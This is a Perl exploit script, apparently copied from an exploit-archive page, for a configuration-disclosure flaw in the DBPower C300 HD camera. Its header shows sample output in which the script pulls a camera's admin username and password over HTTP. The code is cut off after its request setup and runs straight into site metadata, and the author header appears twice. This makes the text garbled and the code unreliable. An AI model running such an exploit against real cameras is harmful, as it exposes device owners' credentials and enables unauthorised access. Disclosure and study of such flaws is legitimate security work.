#!/usr/bin/perl
#
# DBPower C300 HD Camera Remote Configuration Disclosure
#
# Copyright 2020 (c) Todor Donev <todor.donev at gmail.com>
#
# https://donev.eu/#
# DBPower C300 HD Camera Remote Configuration Disclosure
#
# Copyright 2020 (c) Todor Donev <todor.donev at gmail.com>
#
# https://donev.eu/
# https://donev.eu/blog/dbpower-c300-multiple-vulnerabilities
#
# Disclaimer:
# This or previous programs are for Educational purpose ONLY. Do not use it without permission.
# The usual disclaimer applies, especially the fact that Todor Donev is not liable for any damages
# caused by direct or indirect use of the information or functionality provided by these programs.
# The author or any Internet provider bears NO responsibility for content or misuse of these programs
# or any derivatives thereof. By using these programs you accept the fact that any damage (dataloss,
# system crash, system compromise, etc.) caused by the use of these programs are not Todor Donev's
# responsibility.
#
# Use them at your own risk!
#
# (Dont do anything without permissions)
#
#
# [ DBPower C300 HD Camera Remote Configuration Disclosure
# [ ==========================================================
# [ Exploit Author: Todor Donev 2020 <todor.donev@gmail.com>
# [ Initializing the browser
# [ >> User-Agent => Seamonkey-1.1.13-1(X11; U; GNU Fedora fc 10) Gecko/20081112
# [ >> Content-Type => application/x-www-form-urlencoded
# [ << Connection => close
# [ << Date =>
# [ << Accept-Ranges => bytes
# [ << Server => thttpd/2.25b 29dec2003
# [ << Content-Length => 25730
# [ << Content-Type => application/octet-stream
# [ << Last-Modified =>
# [ << Client-Date =>
# [ << Client-Peer => 192.168.1.103:8080
# [ << Client-Response-Num => 1
# [
# [ Username : admin
# [ Password : admin
#
use strict;
use HTTP::Request;
use LWP::UserAgent;
use WWW::UserAgent::Random;
use Gzip::Faster 'gunzip';
my $host = shift || ''; # Full path url to the store
my $cmd = shift || ''; # show - Show configuration dump
$host =~ s//$//;
print "
DBPower C300 HD Camera Remote Configuration Disclosure
- Details
- Written by: khalil shreateh
- Category: Vulnerabilities
- Hits: 292